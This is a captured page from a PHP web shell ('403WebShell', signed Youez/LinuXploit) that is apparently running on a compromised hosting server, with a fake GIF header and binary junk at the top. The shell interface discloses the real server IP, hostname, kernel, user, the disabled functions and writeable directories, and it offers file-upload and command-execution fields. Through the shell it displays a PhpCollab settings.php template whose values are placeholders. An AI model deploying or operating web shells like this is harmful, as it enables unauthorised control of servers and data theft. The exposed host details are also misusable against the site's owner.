GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 3.135.206.19
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/phpcol/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/softaculous/phpcol/settings.php
<?php
/*
 * Application name: PhpCollab
 * Path by root: ../includes/settings.php
 *
 * File auto-generated @ 2021-10-11 05:34am
 *
 * For more information about this file, visit:
 * https://github.com/phpcollab/phpcollab/wiki/Settings
 *
 */

# PhpCollab version
$version = "2.10.3";

# installation type
# Options: (default) online | offline
$installationType = "online";

# select database application
# Options: mysql | postgresql | sqlserver
$databaseType = "mysql";

# database parameters
define("MYSERVER", "[[softdbhost]]");
define("MYLOGIN", "[[softdbuser]]");
define("MYPASSWORD", "[[softdbpass]]");
define("MYDATABASE", "[[softdb]]");

# notification method
# Option: (default) mail | smtp
$notificationMethod = "mail";

# smtp parameters
if ($notificationMethod === "smtp") {
    define("SMTPSERVER", "");
    define("SMTPLOGIN", "");
    define("SMTPPASSWORD", "");
    define("SMTPPORT", "");
}

# create folder method
# Options: (default) PHP | FTP
$mkdirMethod = "PHP";

# ftp parameters
# note: only needed if the mkdirMethod is set to FTP
if ($mkdirMethod === "FTP") {
    # PhpCollab root according to ftp account
    # note: No slash at the end
    $ftpRoot = "";

    define("FTPSERVER", "");
    define("FTPLOGIN", "");
    define("FTPPASSWORD", "");
}

# Invoicing module
$enableInvoicing = false;

# theme choice
define("THEME", "default");

# newsdesk limiter
$newsdesklimit = true;

# if 1 the admin logs in his homepage
$adminathome = false;

# timezone GMT management
$gmtTimezone = false;

# language choice
# (default) en
$langDefault = "[[language]]";

# Mantis bug tracking parameters
$enableMantis = false;

if ($enableMantis === true) {
    # Mantis installation directory
    # note: add a slash at the end
    $pathMantis = "";
}

# https related parameters
$pathToOpenssl = "/usr/bin/openssl";

# login method, set to "CRYPT"
# Options: (default) crypt | plain | md5
# It is highly recommended to NOT use MD5 or PLAIN
$loginMethod = "crypt";

# enable LDAP
$useLDAP = false;
if ($useLDAP) {
    $configLDAP["ldapserver"] = "";
    $configLDAP["searchroot"] = "";
}

# htaccess parameters
$htaccessAuth = false;
if ($htaccessAuth) {
    # note: no slash at the end
    $fullPath = "";
}

# file management parameters
$fileManagement = true;

# Size in bytes for uploads
# Default is 10Mb
$maxFileSize = 10485760;

# Root Path
# note: no slash at the end
$root = "[[softurl]]";

# security issue to disallow php files upload
$allowPhp = false;

# project site creation
$sitePublish = true;

# enable update checker
# (default) true
$updateChecker = true;

# e-mail notifications
# (default) true
$notifications = true;

# show peer review area
$peerReview = true;

# show items for home
$showHomeBookmarks = true;
$showHomeProjects = true;
$showHomeTasks = true;
$showHomeSubtasks = true;
$showHomeDiscussions = true;
$showHomeReports = true;
$showHomeNotes = true;
$showHomeNewsdesk = true;

# security issue to disallow auto-login from external link
$forcedLogin = false;

# table prefix
$tablePrefix = "[[dbprefix]]";

# database tables
$tableCollab["assignments"] = "[[dbprefix]]assignments";
$tableCollab["calendar"] = "[[dbprefix]]calendar";
$tableCollab["files"] = "[[dbprefix]]files";
$tableCollab["logs"] = "[[dbprefix]]logs";
$tableCollab["members"] = "[[dbprefix]]members";
$tableCollab["notes"] = "[[dbprefix]]notes";
$tableCollab["notifications"] = "[[dbprefix]]notifications";
$tableCollab["organizations"] = "[[dbprefix]]organizations";
$tableCollab["posts"] = "[[dbprefix]]posts";
$tableCollab["projects"] = "[[dbprefix]]projects";
$tableCollab["reports"] = "[[dbprefix]]reports";
$tableCollab["sorting"] = "[[dbprefix]]sorting";
$tableCollab["tasks"] = "[[dbprefix]]tasks";
$tableCollab["teams"] = "[[dbprefix]]teams";
$tableCollab["topics"] = "[[dbprefix]]topics";
$tableCollab["phases"] = "[[dbprefix]]phases";
$tableCollab["support_requests"] = "[[dbprefix]]support_requests";
$tableCollab["support_posts"] = "[[dbprefix]]support_posts";
$tableCollab["subtasks"] = "[[dbprefix]]subtasks";
$tableCollab["updates"] = "[[dbprefix]]updates";
$tableCollab["bookmarks"] = "[[dbprefix]]bookmarks";
$tableCollab["bookmarks_categories"] = "[[dbprefix]]bookmarks_categories";
$tableCollab["invoices"] = "[[dbprefix]]invoices";
$tableCollab["invoices_items"] = "[[dbprefix]]invoices_items";
$tableCollab["services"] = "[[dbprefix]]services";
$tableCollab["newsdeskcomments"] = "[[dbprefix]]newsdeskcomments";
$tableCollab["newsdeskposts"] = "[[dbprefix]]newsdeskposts";

# demo mode parameters
$demoMode = false;
$urlContact = "https://www.sourceforge.net/projects/phpcollab";

# Gantt graphs
$activeJpgraph = true;

# filter to see only logged user clients (in team / owner)
$clientsFilter = true;

# filter to see only logged user projects (in team / owner)
$projectsFilter = true;

# Enable help center support requests
$enableHelpSupport = true;

# Return email address given for clients to respond too.
$supportEmail = "";

# Support Type
# Options: (default) team | admin
# If team is selected, a notification will be sent to everyone in the team when a new request is added
$supportType = "team";

# enable the redirection to the last visited page, EXPERIMENTAL DO NOT USE IT
$lastvisitedpage = false;

# auto-publish tasks added from client site?
$autoPublishTasks = false;

# html header parameters
$setTitle = "phpCollab";
$siteTitle = "phpCollab";
$setDescription = "Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).";
$setKeywords = "PhpCollab, phpcollab.com, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup";

# Email alerts
$emailAlerts = false;

/**
 * Authentication Settings
 */
$resetPasswordTimes = [
    'tokenLifespan' => 60,
    'timeBetweenAttempts' => 15,
    'attemptLimit' => 3
];

/**
 * Debugging Settings.
 * DO NOT Change these on a Production server unless you know what you are doing.
 * Refer to: https://phpcollab.com/debugging for more information
 */

# enable development bar in footer
$footerDev = false;

$logLevel = 400;

$uuid = "[[uuid]]";

Youez - 2016 - github.com/yon3zu
LinuXploit